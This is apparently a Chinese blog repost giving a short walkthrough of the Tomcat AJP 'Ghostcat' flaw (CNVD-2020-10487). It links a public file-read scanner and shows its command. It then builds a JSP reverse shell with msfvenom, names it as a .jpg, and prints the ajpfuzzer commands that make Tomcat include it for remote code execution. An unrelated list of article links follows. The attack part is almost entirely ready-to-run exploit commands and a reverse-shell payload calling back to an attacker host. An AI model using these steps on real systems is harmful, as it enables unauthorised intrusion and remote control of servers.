当前位置: 首页 > news >正文

WEB渗透-TomcatAjp之LFIRCE

news 2025/7/22 14:00:43 
LFI
https://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner
>python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.0.110 -p 8009 -f pass

image

配合目标文件上传传入服务器

RCE
>msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.107 LPORT=12138 R >/var/www/html/1.jpg

image

>java -jar ajpfuzzer_v0.6.jar
>connect 192.168.0.110 8009
>forwardrequest 2 "HTTP/1.1" "/index.jsp" 192.168.0.107 192.168.0.107 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:index.jsp","javax.servlet.include.path_info:/1.jpg","javax.servlet.include.servlet_path:/"

image

http://www.lryc.cn/news/422738.html

相关文章:

  • 嵌入式初学-C语言-二一
  • 2376. 统计特殊整数
  • Python 绘图进阶之核密度估计图:掌握数据分布的秘密
  • 设计模式(1)创建型模式和结构型模式
  • RuoYi-Vue新建模块
  • Element-UI自学实践
  • ChatGPT如何工作:创作一首诗的过程
  • Linux_Shell变量及运算符-05
  • OpenCV图像滤波(13)均值迁移滤波函数pyrMeanShiftFiltering()的使用
  • 用爬虫技术探索石墨文档:数据自动化处理与个性化应用的创新实践
  • 【JavaEE初阶】线程池
  • zdpgo_cobra_req 新增解析请求体内容
  • Java聚合快递对接云洋系统快递小程序源码
  • 陕西西安培华学院计算机软件工程毕业设计课题选题参考目录​
  • 如何用sql在1分钟从1T数据中精准定位查询?Hive离线数仓 Spark分析
  • acpi 主板布局需要 efi
  • 月之暗面对谈 Zilliz:长文本和 RAG 如何选择?
  • 高级java每日一道面试题-2024年8月12日-设计模式篇-请列举出在JDK中几个常用的设计模式?
  • mysql workbench8.0如何导出mysql5.7格式的sql定义
  • 数据结构(学习)2024.8.6(顺序表)
  • MyBatis全解
  • 【Redis进阶】Redis集群
  • JVM运行时数据区之虚拟机栈
  • Python 机器学习求解 PDE 学习项目 基础知识(4)PyTorch 库函数使用详细案例
  • SpringBoot-enjoy模板引擎
  • 【学习笔记】如何训练大模型
  • 高可用集群KEEPALIVED
  • Linux shell编程学习笔记69: curl 命令行网络数据传输工具 选项数量雷人(中)
  • 怎么在网站底部添加站点地图?
  • bash和sh的区别